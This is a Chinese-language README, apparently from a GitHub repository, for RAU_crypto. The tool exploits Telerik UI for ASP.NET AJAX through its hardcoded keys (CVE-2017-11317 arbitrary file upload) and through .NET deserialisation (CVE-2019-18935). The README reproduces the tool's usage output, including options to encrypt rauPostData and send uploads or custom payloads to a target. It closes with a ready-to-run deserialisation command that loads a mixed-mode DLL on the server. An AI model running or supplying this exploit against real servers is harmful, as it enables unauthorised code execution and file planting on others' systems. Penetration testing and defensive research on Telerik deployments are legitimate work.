针对 Telerik UI for ASP.NET AJAX 的组合利用工具。
利用通常需要包含硬编码密钥的版本,或者需要知道密钥(例如能获取到 web.config 的内容)。该工具也支持直接解密和加密用于 Telerik.Web.UI.WebResource.axd?type=rau 的 rauPostData 数据。
pip3 install pycryptodome 或 pip3 install pycryptodomex 安装我的另一个 Telerik UI 利用工具(针对 CVE-2017-9248)可能也会引起你的兴趣。地址如下:
注意 - 最后四项已完成但尚未发布。
文件上传漏洞(CVE-2017-11317)由其他人发现,相信归功于 @straight_blast @pwntester @olekmirosh 。该漏洞公布后不久,我在工作中遇到了 Telerik 库,因此研究了该漏洞并于 2017 年 7 月编写了此利用工具。我还报告了相关的 CVE-2017-11357(不安全直接对象引用)。
.NET 反序列化漏洞(CVE-2019-18935)由 @mwulftange 发现。
https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization
$ ./RAU_crypto.py
RAU_crypto by Paul Taylor / @bao7uo
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation
Usage:
Decrypt a ciphertext: -d ciphertext
Decrypt rauPostData: -D rauPostData
Encrypt a plaintext: -e plaintext
Generate file upload rauPostData: -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file: -P c:\\destination\\folder Version c:\\local\\filename url [proxy]
Generate custom payload POST data : -c partA partB
Send custom payload: -C partA partB url [proxy]
Example URL: http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version format: 2016.2.504
Example optional proxy: 127.0.0.1:8080
N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS
$
解密截图
上传截图
关于 .NET 反序列化自定义 payload 的详细信息,请参阅 @mwulftange 在 Code White 博客上发表的精彩文章(该漏洞的发现者),链接如下。
其他相关链接。
.NET 反序列化 payload 示例:
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau
关于混合模式 DLL,请参阅我的另一个 GitHub 仓库:
特别感谢 @irsdl 对自定义 payload 功能的启发。